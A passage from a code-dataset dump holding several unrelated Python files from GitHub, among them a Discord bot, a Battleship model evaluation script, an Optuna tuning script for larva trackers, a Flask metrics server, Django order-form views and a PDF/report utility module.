1\n\n# ------------------\n\nANSWER_NUM_DICT = {\"open\": 10331, \"onto\":89, \"wiki\": 4600, \"kb\":130, \"gen\":9}\n\nKB_VOCAB = load_vocab_dict(FILE_ROOT + \"/ontology/types.txt\", 130)\nWIKI_VOCAB = load_vocab_dict(FILE_ROOT + \"/ontology/types.txt\", 4600)\nANSWER_VOCAB = load_vocab_dict(FILE_ROOT + \"/ontology/types.txt\")\nONTO_ANS_VOCAB = load_vocab_dict(FILE_ROOT + '/ontology/onto_ontology.txt')\nANS2ID_DICT = {\"open\": ANSWER_VOCAB, \"wiki\": WIKI_VOCAB, \"kb\": KB_VOCAB, \"onto\":ONTO_ANS_VOCAB}\n\nELMO_OPTIONS_FILE = \"https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_options.json\"\nELMO_WEIGHT_FILE = \"https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5\"\n\nTYPE_BOS_IDX = 10332\nTYPE_EOS_IDX = 10331\nTYPE_PAD_IDX = 10333\n\nopen_id2ans = {v: k for k, v in ANSWER_VOCAB.items()}\nwiki_id2ans = {v: k for k, v in WIKI_VOCAB.items()}\nkb_id2ans = {v:k for k,v in KB_VOCAB.items()}\ng_id2ans = {v: k for k, v in ONTO_ANS_VOCAB.items()}\n\nID2ANS_DICT = {\"open\": open_id2ans, \"wiki\": wiki_id2ans, \"kb\": kb_id2ans, \"onto\":g_id2ans}\nlabel_string = namedtuple(\"label_types\", [\"head\", \"wiki\", \"kb\"])\nLABEL = label_string(\"HEAD\", \"WIKI\", \"KB\")\n\nCHAR_DICT = defaultdict(int)\nchar_vocab = [u\"\"]\nwith open(FILE_ROOT + \"/ontology/char_vocab.english.txt\") as f:\n char_vocab.extend(c.strip() for c in f.readlines())\n CHAR_DICT.update({c: i for i, c in enumerate(char_vocab)})\n","repo_name":"yasumasaonoe/DenoiseET","sub_path":"resources/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"27"} +{"seq_id":"18411170306","text":"import os\nimport logging\nimport discord\nfrom discord_slash import SlashCommand\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\nimport builtins\n\nintents = discord.Intents.default()\nintents.members = True\n\nbot = commands.Bot(\n command_prefix='!',\n activity=discord.Game('with the discord API!'),\n intents=intents,\n)\n\n# Register the Slash command handler.\nslash = SlashCommand(bot, sync_commands=True, sync_on_cog_reload=True)\nbot.remove_command('help')\nbuiltins.bot = bot\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\n\nlogger = logging.getLogger('discord')\nlogger.setLevel(logging.ERROR)\nhandler = logging.FileHandler(\n filename='discord.log',\n encoding='utf-8',\n mode='w'\n)\nhandler.setFormatter(\n logging.Formatter('%(asctime)s:%(levelname)s: %(message)s')\n)\nlogger.addHandler(handler)\n\n\n@bot.command()\nasync def load(ctx, extension):\n bot.load_extension(f'cogs.{extension}')\n\n\n@bot.command()\nasync def unload(ctx, extension):\n bot.unload_extension(f'cogs.{extension}')\n\n\n@bot.command()\nasync def reload(ctx, extension):\n bot.unload_extension(f'cogs.{extension}')\n bot.load_extension(f'cogs.{extension}')\n\n\"\"\"Load all files in cogs folder (remove '.py' from filename when loading)\"\"\"\nfor filename in os.listdir(f\"{__path__[0]}/cogs\"):\n if filename.endswith('.py'):\n bot.load_extension(f'src.cogs.{filename[:-3]}')\n\n\n@bot.event\nasync def on_ready():\n print(f'{bot.user.name} has joined the chat!')\n\n\nbot.run(TOKEN)\n","repo_name":"KnightHacks/DiscordBot-New","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73933725512","text":"import Arena\nfrom MCTS import MCTS\nfrom battleship.BattleshipGame import BattleshipGame\nfrom battleship.BattleshipPlayers import *\nfrom battleship.pytorch.NNet import NNetWrapper as NNet\n\nimport matplotlib.pyplot as plt\n\n\nimport numpy as np\nfrom utils import *\nimport os\n\n\"\"\"\nuse this script to test the performance of a model trained\n\"\"\"\n\nl_random_ratio = []\nl_greedy_ratio = []\nl_v0 = []\niter_max = 100\narenaCompare = 100 #40\n\ng = BattleshipGame(6)\n\nrp = RandomPlayer(g).play\ngp = GreedyBattleShipPlayer(g).play\n\nn1 = NNet(g)\nargs = dotdict({'numMCTSSims': 50, 'cpuct': 1.0})\n\nfor iter in range(10, iter_max+1):\n\n print(iter)\n\n\n if os.path.exists('./temp/' + 'checkpoint_' + str(iter) + '.pth.tar'):\n\n n1.load_checkpoint('./temp/','checkpoint_' + str(iter) + '.pth.tar')\n\n _, v0 = n1.predict(np.zeros((6, 6)))\n l_v0.append(v0)\n\n mcts1 = MCTS(g, n1, args)\n n1p = lambda x: np.argmax(mcts1.getActionProb(x, temp=0))\n\n\n arena_r = Arena.Arena(n1p, rp, g)\n arena_g = Arena.Arena(n1p, gp, g)\n\n rpwins, rnwins, rdraws = arena_r.playGames(arenaCompare)\n gpwins, gnwins, gdraws = arena_g.playGames(arenaCompare)\n\n l_random_ratio.append((rpwins, rnwins, rdraws))\n l_greedy_ratio.append((gpwins, gnwins, gdraws))\n\nl_iter = range(10, iter_max+1)\n\nplt.plot(l_iter, l_v0, color = \"black\", label = \"estimate of the value of an ititial board by the network\")\n\nplt.plot(l_iter, [rpwins/arenaCompare for rpwins, _, _ in l_random_ratio], color = \"red\", label = \"ratio win against random agent\")\nplt.plot(l_iter, [rdraws/arenaCompare for _, rdraws, _ in l_random_ratio], color = \"yellow\", label = \"ratio draw against random agent\")\n\nplt.plot(l_iter, [gpwins/arenaCompare for gpwins, _, _ in l_greedy_ratio], color = \"blue\", label = \"ratio win against greedy agent\")\nplt.plot(l_iter, [gdraws/arenaCompare for _, gdraws, _ in l_greedy_ratio], color = \"green\", label = \"ratio draw against greedy agent\")\n\nplt.xlabel('iterations')\n\nplt.legend(loc = \"upper left\")\nplt.title(\"Performance against a random and a greedy agent\")\n\nplt.savefig(\"PerformanceBattleShip_ter.png\")\n\n\n\n\n","repo_name":"alexisbouley/alpha-zero-general","sub_path":"AnalyseResults.py","file_name":"AnalyseResults.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6812334076","text":"import requests.auth\nfrom epc.common.comm import req_sess, CommException\nimport epc.common.settings as settings\nfrom epc.common.platform import PlatformData\n\n\nclass EPCAuth(requests.auth.AuthBase):\n \"\"\"Custom authentication class. Currently uses JWT\"\"\"\n def __init__(self, data):\n self.data = data\n self.token = None\n\n def authenticate(self):\n \"\"\"Send the authentication request to the backend\"\"\"\n req = req_sess.post('auth', json=self.data)\n if req.ok:\n self.token = req.text\n return req.ok\n\n def response_hook(self, r, **kwargs):\n \"\"\"Handle token renewal\"\"\"\n if r.status_code == 401:\n if not self.authenticate():\n return r\n # Consume content and release the original connection\n # to allow our new request to reuse the same one.\n r.content # noqa\n r.raw.release_conn()\n request = r.request.copy()\n request.headers.update({'Authorization': 'Bearer {}'.format(self.token)})\n return r.connection.send(request, kwargs)\n return r\n\n def __call__(self, r):\n r.headers.update({'Authorization': 'Bearer {}'.format(self.token)})\n r.register_hook('response', self.response_hook)\n return r\n\n\ndef setup_auth(system_name: str) -> bool:\n \"\"\"Setup the authentication module\"\"\"\n import warnings\n warnings.warn(\"setup_auth is deprecated, use common.service\", DeprecationWarning)\n auth_data = PlatformData(system_name).get_data()\n try:\n req = req_sess.post('enroll', json=auth_data)\n if not req.ok:\n return False\n auth_data['token'] = req.text\n settings.Config().add_setting('AGENT_TOKEN', auth_data['token'])\n except CommException:\n return False\n\n req_sess.auth = EPCAuth(auth_data)\n return True\n","repo_name":"PokeSec/agentlib","sub_path":"epc/common/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41201506587","text":"import multiprocessing\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\nimport optuna\nimport datetime\nimport subprocess\nimport argparse\nimport joblib\n\n\ndef list_of_strings(arg):\n return arg.split(',')\n\n\ndef list_of_ints(arg):\n return [int(x) for x in arg.split(',')]\n\n\n# Converts the csv file with the target number of larvae to a dictionary\ndef csv_file_to_dict(arg):\n target_nr_dict = {}\n with open(arg, 'r') as file:\n lines = file.readlines()[1:] # Skip the first line\n for line in lines:\n # Replace ; with , to make it compatible with the German csv file #TODO: make this more general\n if ',' not in line:\n line = line.replace(';', ',')\n\n row = line.strip().split(',')\n\n # Remove all '' from the list, which occur because of different row lengths\n row = [x for x in row if x != '']\n\n # Create a list for each video, which contains tuples of (time, target_nr) values\n target_nr_dict[row[0]] = []\n for i in range(1, len(row), 2):\n # Append a tuple of (time, target_nr) to the list\n target_nr_dict[row[0]].append((float(row[i]), int(row[i + 1])))\n return target_nr_dict\n\n\nparser = argparse.ArgumentParser()\n\n# Positional arguments\nparser.add_argument('tracker', help='Tracker that should be used. Select between MWT, TIERPSY, and WF-NTP')\nparser.add_argument('working_dir', help='Working directory is expected to have a subdirectory named '\n 'TRACKER-cli for the tracker that is supposed to be used')\nparser.add_argument('video_dir', help='Path to the directory in which all video files lie in')\nparser.add_argument('target_larvae_nr', type=csv_file_to_dict,\n help='Provide a csv file with the target number of larvae to detect in each video.')\n\n# Optional arguments\nparser.add_argument('--video_names', type=list_of_strings,\n help='If you do not want to use all videos in the provided video directory, you can specify a list '\n 'of video names (including extension) that should be used for the optimization.')\nparser.add_argument('--fps', type=int, default=30,\n help='Frame rate of the videos.')\nparser.add_argument('--downsampled_fps', type=int,\n help='For WF-NTP, there is the option to downsample the '\n 'videos to a lower frame rate to speed up processing.')\nparser.add_argument('--plot', action='store_true',\n help='Plot the number of detected larvae over time for each hyperparameter set.')\nparser.add_argument('--nr_trials', type=int, default=100)\nparser.add_argument('--nr_processes', type=int, default=1,\n help=\"Number of processes (each processing one video) that should run in parallel.\")\nparser.add_argument('--debug', action='store_true', help='Print debug information.')\nparser.add_argument('--prune', action='store_true',\n help='Useful if you have more videos than processes, as it will prune unpromising trials after '\n 'processing the first video.')\n\nargs = parser.parse_args()\n\n\n# Plot number of detected larvae over time\ndef plot_nr_detected_larvae(working_dir, date_time, dataframe, tracker, video_id):\n plt.figure(figsize=(5, 3))\n\n # Get number of detected larvae for each time point\n if tracker == 'MWT' or tracker == 'TIERPSY':\n dataframe.groupby('time').larva_id.nunique().plot()\n elif tracker == 'WF-NTP':\n dataframe.groupby('time').particle.nunique().plot()\n\n # Plot target number of larvae\n x, y = [], []\n for target_time, target_nr in args.target_larvae_nr[video_id]:\n x.append(target_time)\n y.append(target_nr)\n x.append(dataframe.time.max())\n y.append(args.target_larvae_nr[video_id][-1][1])\n plt.plot(x, y, color='r', linestyle='--', label='Target Number')\n\n # Format plot\n plt.gca().set_ylim(bottom=0)\n plt.xlabel('Time in Seconds')\n plt.ylabel('Number of Detected Larvae')\n plt.title(video_id)\n plt.legend()\n\n # Save plot\n save_path = os.path.join(working_dir, 'data', 'Optuna', video_id, date_time, f'nr_larvae_tracked_{video_id}.png')\n plt.savefig(save_path, dpi=120, bbox_inches='tight')\n plt.close()\n\n\n# Processed the different output files of the trackers to get the number of detected larvae for each time point\ndef get_nr_detected_larvae_from_tracks(track_path, working_dir, date_time, tracker, video_id, video_nr):\n # track_path can be a spine file (for MWT and Tierpsy) or a track.p file (for WF-NTP)\n if tracker == 'MWT' or tracker == 'TIERPSY':\n # Save content of spine file (MWT and Tierpsy output) in a pandas dataframe\n spine_df = pd.read_csv(track_path, sep=' ', header=None)\n columns_points = []\n for i in range(1, 12):\n columns_points.extend([f'spinepoint{i}_x', f'spinepoint{i}_y'])\n spine_df.columns = ['date_time', 'larva_id', 'time'] + columns_points\n\n if args.plot:\n plot_nr_detected_larvae(working_dir, date_time, spine_df, tracker, video_id)\n return spine_df.groupby('time').larva_id.nunique()\n\n elif tracker == 'WF-NTP':\n # Save content of track.p file (WF-NTP output) in a pandas dataframe\n df = pd.read_pickle(track_path)\n df.reset_index(drop=True, inplace=True)\n # Add time column\n df['time'] = df['frame'] / args.fps\n\n if args.plot:\n plot_nr_detected_larvae(working_dir, date_time, df, tracker, video_id)\n return df.groupby('time').particle.nunique()\n\n\n# Get hyperparameters for the tracker that should be optimized using optuna\ndef get_hyperparameters(trial, tracker):\n date_time = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')\n if tracker == 'MWT':\n pixel_thr1 = trial.suggest_int('pixel-thr1', 100, 255 - 1)\n pixel_thr2 = trial.suggest_int('pixel-thr2', pixel_thr1 + 1, 255)\n size_thr1 = trial.suggest_int('size-thr1', 1, 100)\n size_thr2 = trial.suggest_int('size-thr2', 1, 100)\n\n hyperparams = (f'--frame-rate {args.fps} --pixel-thresholds {pixel_thr1} {pixel_thr2} '\n f'--size-thresholds {size_thr1} {size_thr2} --pixel-size 0.073 '\n f'--date-time {date_time}').split(' ')\n elif tracker == 'TIERPSY':\n mask_min_area = trial.suggest_int('mask-min-area', 0, 100) # 1, 50\n mask_max_area = trial.suggest_int('mask-max-area', mask_min_area, 10000) # 1e8\n thresh_C = trial.suggest_int('thresh-C', 0, 100) # 10,20\n thresh_block_size = trial.suggest_int('thresh-block-size', 50, 70) # 0, 500\n dilation_size = trial.suggest_int('dilation-size', 5, 15) # 1, 100\n strel_size = trial.suggest_int('strel-size', 4, 8)\n worm_bw_thresh_factor = trial.suggest_float('worm-bw-thresh-factor', 0.8, 1.5)\n\n hyperparams = (f'--frame-rate {args.fps} --mask-min-area {mask_min_area} --mask-max-area {mask_max_area} '\n f'--strel-size {strel_size} --worm-bw-thresh-factor {worm_bw_thresh_factor} '\n f'--thresh-block-size {thresh_block_size} --dilation-size {dilation_size} '\n f'--thresh-C {thresh_C} --pixel-size 0.073 --date-time {date_time}').split(' ')\n\n elif tracker == 'WF-NTP':\n # The hyperparameters that appear in the WF-NTP paper in Figure 11 are included here\n threshold = trial.suggest_int('threshold', 1, 20)\n opening = trial.suggest_int('opening', 1, 5)\n closing = trial.suggest_int('closing', 1, 5)\n min_size = trial.suggest_int('min-size', 10, 60)\n max_size = trial.suggest_int('max-size', min_size, 3000)\n minimum_ecc = trial.suggest_float('minimum-ecc', 0.5, 1.0)\n\n hyperparams = (f'--fps {args.fps} --px_to_mm 0.073 --threshold {threshold} --opening {opening} '\n f'--closing {closing} --min_size {min_size} --max_size {max_size} --minimum_ecc {minimum_ecc} '\n f'--skeletonize True --do_full_prune True').split(' ')\n\n # Add downsampling option if specified via command line\n if args.downsampled_fps is not None:\n print(f'Downsampling videos to {args.downsampled_fps} fps')\n hyperparams.extend(f'--downsampled_fps {args.downsampled_fps}'.split(' '))\n\n # Adjust frame rate for WF-NTP for correct downstream processing\n args.fps = args.downsampled_fps\n return hyperparams, date_time\n\n\ndef analyze_one_video(video_path, hyperparams, working_dir, date_time, video_nr, trial):\n video_id = os.path.basename(video_path).split('.')[0]\n print('Analyzing video: ', video_id)\n\n # Get the basic command for the specified tracker\n # For all trackers, the output directory is of the form: data/Optuna/VIDEO_ID/DATE_TIME\n if args.tracker == 'MWT':\n command = ['julia', '--project=.', f'src/{args.tracker.lower()}-cli.jl', video_path,\n f'./data/Optuna/{video_id}']\n elif args.tracker == 'TIERPSY':\n command = ['julia', '--project=.', f'src/{args.tracker.lower()}-cli.jl', video_path,\n f'./data/Optuna/{video_id}/{date_time}']\n elif args.tracker == 'WF-NTP':\n os.makedirs(f'{working_dir}/data/Optuna/{video_id}/{date_time}')\n command = ['python', f'{working_dir}/src/wf_ntp_cli.py', video_path, f'./data/Optuna/{video_id}/{date_time}']\n command.extend(hyperparams)\n\n try: # Bad Hyperparameter sets can cause errors, so we need to catch them and prune the trial\n if args.debug:\n out, err = subprocess.PIPE, subprocess.PIPE\n else:\n out, err = subprocess.DEVNULL, subprocess.DEVNULL\n\n # Run tracker for one video from working directory\n subprocess.run(command, cwd=working_dir, stdout=out, stderr=err)\n\n # Each tracker has a different name for the file that contains the tracks, so we need to handle this\n if args.tracker == 'MWT':\n spine_file_name = '20.spine'\n elif args.tracker == 'TIERPSY':\n spine_file_name = video_path.split('\\\\')[-1].split('.')[0] + '.spine'\n elif args.tracker == 'WF-NTP':\n spine_file_name = f'{video_id}_downsampled_track.p' if args.downsampled_fps != -1 else f'{video_id}_track.p'\n\n # Get number of detected larvae from output tracks\n nr_larvae_tracked = get_nr_detected_larvae_from_tracks(\n f'{working_dir}/data/Optuna/{video_id}/{date_time}/{spine_file_name}', working_dir, date_time, args.tracker,\n video_id, video_nr)\n\n except:\n # Prune optuna trial, because the hyperparameters caused an error in the tracking\n print('Exception when using hyperparameters: ', hyperparams, '\\nTrying next set of hyperparameters...')\n raise optuna.TrialPruned()\n\n # Calculate error for this video\n video_error = calculate_error(nr_larvae_tracked, video_id)\n\n # Handle pruning if specified via command line\n if args.prune:\n # Report intermedidate error\n trial.report(video_error, video_nr)\n\n # The current trial is pruned if the error is too high\n if trial.should_prune():\n print('Pruning trial because of high error for one video: ', video_error)\n raise optuna.TrialPruned()\n return video_error\n\n\n# Calculate the mean deviation of the detected number of larvae from the target number of larvae\ndef calculate_error(nr_larvae_tracked, video_id):\n # Get target number of larvae for this video\n target_nr_list = args.target_larvae_nr[video_id]\n\n cumulative_error = 0.0\n current_target_nr = np.Inf\n # Calculate cumulative error over the entire video\n for time, detected_larvae in nr_larvae_tracked.items():\n # For one time point in the output track file, get the target number of larvae\n for target_time, target_nr in target_nr_list:\n if time >= target_time:\n current_target_nr = target_nr\n elif time < target_time:\n break\n\n # Add the error for this time point (the deviation of the detected number of larvae from the actual number)\n # to the cumulative error\n cumulative_error += abs(detected_larvae - current_target_nr) / current_target_nr\n\n # Average the cumulative error over the entire video to get the mean error\n return cumulative_error / len(nr_larvae_tracked)\n\n\n# Objective function for optuna\ndef objective(trial):\n # Get hyperparameters for this trial\n hyperparams, date_time = get_hyperparameters(trial, args.tracker)\n\n video_paths = [os.path.join(args.video_dir, video_name) for video_name in list(args.video_names)]\n working_dir = f'{args.working_dir}/{args.tracker.lower()}-cli'\n\n total_error = 0.0\n # Create a list of running parameters for each video so that they can be run in parallel\n parallel_run_params = [(current_video_path, hyperparams, working_dir, date_time, video_nr, trial) for\n video_nr, current_video_path in enumerate(video_paths)]\n\n # Run tracker on videos in parallel, using the number or parallel processes specified in args.nr_processes\n with multiprocessing.Pool(processes=args.nr_processes) as pool:\n # Each process returns the error for one video\n errors = pool.starmap(analyze_one_video, parallel_run_params)\n\n # Calculate the cumulative error over all videos\n for video_error in errors:\n total_error += video_error\n\n # Return the mean error over all videos, representing the mean error for that set of hyperparameters\n return total_error / len(video_paths)\n\n\ndef main():\n # Check if provided tracker is supported\n if args.tracker != 'MWT' and args.tracker != 'TIERPSY' and args.tracker != 'WF-NTP':\n raise ValueError('Tracker not supported')\n\n # Obtain video names from video directory if no video names are provided\n if args.video_names is None:\n args.video_names = os.listdir(args.video_dir)\n\n # If necessary, filter video names to only include videos that are used for optimization\n # and make sure no video is missing\n if len(args.video_names) != len(args.target_larvae_nr.keys()):\n for video_name in args.video_names:\n if video_name.replace('.avi', '') not in args.target_larvae_nr.keys():\n raise ValueError(\n f'Video name {video_name.replace(\".avi\", \"\")} not found in target number of larvae dictionary.')\n # Filter dictionary to only include videos that are used for optimization\n args.target_larvae_nr = {k: v for k, v in args.target_larvae_nr.items() if k in args.video_names}\n\n print(f'Number of videos included in optimization: {len(args.video_names)}')\n\n if not os.path.exists(f'{args.working_dir}/{args.tracker.lower()}-cli/data/Optuna'):\n os.mkdir(f'{args.working_dir}/{args.tracker.lower()}-cli/data/Optuna')\n\n # Create optuna study and optimize hyperparameters\n study = optuna.create_study(direction='minimize', study_name=f'Parameter_Optimization_{args.tracker}')\n study.optimize(objective, n_trials=args.nr_trials)\n\n # Save study and results\n date_time = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')\n joblib.dump(study, f'{args.working_dir}/{args.tracker.lower()}-cli/data/Optuna/{study.study_name}_{date_time}.pkl')\n df = study.trials_dataframe()\n df.to_csv(f'{args.working_dir}/{args.tracker.lower()}-cli/data/Optuna/{study.study_name}_{date_time}.csv')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Lilly-May/larva-tagger-tune","sub_path":"ParameterOptimization.py","file_name":"ParameterOptimization.py","file_ext":"py","file_size_in_byte":15620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39710361660","text":"from flask import Flask, request, render_template\nimport json\n\n# This script runs a Flask server for rendering a single web page which displays the\n# required metrics data. The data is posted regularly here by the gRPC client which computes it.\n# Scripts in the web page can then GET this data at regular intervals, for display.\n\n\n# A global dictionary for storing the metrics data.\nglobal metricsData\nmetricsData = dict()\n\n\napp = Flask(__name__)\n\n\n# This is the route that renders the dashboard web page.\n@app.route('/')\ndef index():\n return render_template(\"index.html\"); \n\n\n\n# This route allows the gRPC client to POST the metrics data.\n# It also allows the web page to GET it on demand.\n@app.route('/metrics', methods = ['POST', 'GET'])\ndef data():\n global metricsData\n if request.method == 'POST':\n metricsData = request.get_json(force = True)\n return ''\n elif request.method == 'GET':\n try:\n return metricsData\n except:\n return ''\n else:\n return ''\n\n\n \nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n\n","repo_name":"DylanOlney/SOFT8026","sub_path":"assig1/flask_server/flaskServer.py","file_name":"flaskServer.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1993737158","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render, redirect\nfrom astiasto.forms import OrderForm\nfrom django.core.mail import EmailMessage\nfrom django.shortcuts import redirect\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom astiasto.models import Item, Genre\n\ndef index(request):\n return render(request, 'main/index.html')\n\ndef about(request):\n return render(request, 'main/about.html')\n\ndef rent(request):\n items = Item.objects.all()\n genres = Genre.objects.all()\n form_class = OrderForm\n if request.method == 'POST':\n form = form_class(data=request.POST)\n if form.is_valid():\n contact_name = request.POST.get(\n 'name'\n , '')\n contact_email = request.POST.get(\n 'email'\n , '')\n form_content = request.POST.get('message', '')\n amount = request.POST.get('amount', '')\n place = request.POST.get('place', '')\n phone = request.POST.get('phone','')\n context = {\n 'contact_name': contact_name,\n 'contact_email': contact_email,\n 'form_content': form_content,\n\n\n }\n for i in Item.objects.all():\n v = i.name\n context[v] = request.POST.get(v, '')\n #for i in Item.objects.all():\n # context = {\n # context,\n\n\n # }\n\n # Email the profile with the\n # contact information\n template = get_template('contact_template.txt')\n\n content = template.render(context)\n\n email = EmailMessage(\n \"New contact form submission\",\n content,\n \"Your website\" +'',\n ['astiasto@jalostajat.fi'],\n headers = {'Reply-To': contact_email }\n )\n email.send()\n return redirect('valmis/')\n\n return render(request, 'main/rent.html', {\n 'form': form_class, 'items':items, 'genres':genres\n })\ndef ordersent(request):\n form = {}\n return render(request, 'main/thanks.html', {'form': form})\n\ndef terms(request):\n #temp = get_template('terms.txt')\n #context = {'terms': temp}\n return render(request, 'main/terms.html')\n\ndef calendar(request):\n #temp = get_template('terms.txt')\n #context = {'terms': temp}\n return render(request, 'main/calendar.html')\n","repo_name":"joelkauppi/astiasto","sub_path":"astiasto/views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26137573836","text":"from tkinter import messagebox\nimport pylatex as ptx\nimport webbrowser as wb\nimport fpdf\nimport shutil\nimport time\nimport funciones.conec_mysql as conec\n\nclass convert():\n def __init__(self, arg= None):\n self.arg = arg\n self.strORlist = arg\n\n # CONVERTIR LISTA DE LISTAS DEL MODO [['8', '8'], ['9', '9']] EN UN STRING\n def list_string(self, list = None):\n if list != None:\n self.strORlist = list\n elif list == None:\n print(\"Faltan argumentos\")\n pass\n \n new_string = \"\"\n\n for i in self.strORlist:\n new_string += \",\".join(i)\n new_string += \"\\n\" \n\n return new_string\n\n # CONVERTIR UN STRING EN UNA LISTA DE LISTAS DEL MODO [['8', '8'], ['9', '9']]\n def string_list(self, string = None):\n\n if string != None:\n self.strORlist = string\n elif string == None:\n print(\"Faltan argumentos\")\n pass\n\n new_list_list = []\n for i in self.strORlist:\n string=i[:-1]\n new_list=string.split(\",\")\n new_list_list.append(new_list)\n return new_list_list\n\n\n\"\"\"##############################################################################################################\"\"\"\n# ------------------------------------------------------------------------------------------------------------------\n\n# ------------------------------------------------------------------------------------------------------------------\n\"\"\"##############################################################################################################\"\"\"\n\n# ESCRIBIR/LEER DOCUMENTO\nclass doc(convert):\n # Doc HEREDA LOS MÉTODOS DE LA CLASE CONVERT \n def __init__(self, doc = \"./documentos/data.txt\"):\n self.doc = doc\n \n def operacion(self, opcion, informacion = None):\n\n self.strORlist = informacion \n\n if opcion == \"soloE\":\n modo = \"a\"\n elif opcion == \"E\" or opcion == \"B\":\n modo = \"w\"\n elif opcion == \"L\":\n modo = \"r\"\n elif opcion == \"LE\":\n modo = \"r\"\n \n with open(self.doc, modo) as file:\n if opcion == \"soloE\" or opcion == \"E\":\n self.string = self.list_string(informacion)\n file.write(self.string)\n elif opcion == \"L\":\n L=self.string_list(file.readlines())\n del L[0]\n return L\n elif opcion == \"LE\":\n L=self.string_list(file.readlines())\n return L\n elif opcion == \"B\":\n file.write(\"\")\n\n\n\"\"\"##############################################################################################################\"\"\"\n# ------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------------\n\"\"\"##############################################################################################################\"\"\"\n#FUNCIONES VARIADAS QUE MODIFICAN CARACTERISTICAS Y DATOS DE LA APLICACIÓN\n\ndef cambiar_doc2(encabezado, nuevo_valor):\n contenido_data=doc(\"./documentos/data2.txt\").operacion(\"LE\")\n for encabezado_dato in contenido_data:\n if encabezado_dato[0] == encabezado:\n encabezado_dato[1] = nuevo_valor\n break\n doc(\"./documentos/data2.txt\").operacion(\"E\",contenido_data)\n\ndef finalizar_op():\n #ENVIA LOS DATOS CONTENIDOS EN EL ARCHIVO DATA A LA BASE DE DATOS\n #conec.enviar_datos_tabla()\n # BORRA LOS DATOS DE DATA PARA QUE MUESTRE SOLO ENCABEZADOS\n doc().operacion(\"E\",\n [['ID_SALIDA','ID_VEHICULO','RUTA','CHOFER','HORA_SALIDA','DIA_SALIDA','MARCA_1','VEL_1','MARCA_2','VEL_2','MARCA_3','VEL_3','MARCA_LLEGADA']])\n # COLOCAR EL CONTADOR DE LOS MAPAS EN CERO\n cambiar_doc2(\"numero_mapas\",\"0\")\n # COLOCAR EL CONTADOR DE NUMERO DE SALIDAS EN CERO\n cambiar_doc2(\"numero_salidas\",\"0\")\n\ndef buscar_doc2(dato_buscado=None):\n datos_encabezados=doc(\"./documentos/data2.txt\").operacion(\"LE\")\n for encabezado_dato in datos_encabezados:\n if encabezado_dato[0] == dato_buscado:\n return encabezado_dato[1]\n\ndef agregar_nueva_salida(data_ingresada):\n n_salida=buscar_doc2(\"numero_salidas\")\n nuevas_salidas=data_ingresada\n for data in nuevas_salidas:\n n_salida=int(n_salida)+1\n data.insert(0,str(n_salida))\n \n cambiar_doc2(\"numero_salidas\",str(n_salida))\n doc().operacion(\"soloE\",nuevas_salidas)\n\ndef modificar_salida(id_salida):\n datos_salida=doc().operacion(\"LE\")\n for salida in datos_salida:\n if salida[0] == id_salida:\n salida.append(time.strftime('%H:%M:%S'))\n doc().operacion(\"E\",datos_salida)\n break\n\n\"\"\"##############################################################################################################\"\"\"\n# ------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------------\n\"\"\"##############################################################################################################\"\"\"\n\n#ABRIR DIRECCIONES WEB\n\n# lista de enlaces\nrepositorio_git_proyecto = \"https://github.com/Programapython/gui_progra_2\"\ninstaladores = \"https://drive.google.com/drive/folders/14vLAJIizDJtl1uRlQGc7pIsXCnJ9yMzS?usp=sharing\"\n\nclass abre():\n def __init__(self, opcion, ventana):\n \n if opcion == \"repo\":\n wb.open(repositorio_git_proyecto)\n elif opcion == \"insta\":\n wb.open(instaladores)\n\n #CIERRA LA VENTANA DE TKINTER QUE NOS REDIRECCIONA AL ENLACE\n if ventana != None:\n ventana.destroy()\n\n# ------------------------------------------------------------------------------------------------------------------\n\"\"\"##############################################################################################################\"\"\"\nclass crear_doc():\n def __init__(self, fecha_solicitada, *vehiculos_buscados):\n pdf=fpdf.FPDF()\n pdf.add_page()\n pdf.set_font(\"Arial\",size=12)\n fecha=time.strftime('%Y-%m-%d')\n pdf.cell(190,10,txt=\"INFORME\",border=True, ln=1, align=\"C\")\n pdf.cell(200,10, txt=f\"Fecha de solicitud: {fecha}\",ln=1, align=\"left\")\n pdf.cell(200,10, txt=f\"Fecha solicitada: {fecha_solicitada}\", ln=1, align=\"left\")\n pdf.cell(200,10, txt=f\"Unidad (es) buscadas: {vehiculos_buscados}\", ln=6, align=\"left\")\n pdf.output(dest='F',name=f\"./documentos/informes/{fecha}_{vehiculos_buscados}.pdf\")\n shutil.copy(f\"./documentos/informes/{fecha}_{vehiculos_buscados}.pdf\", buscar_doc2(\"direccion_informe\"))\n\n\n# 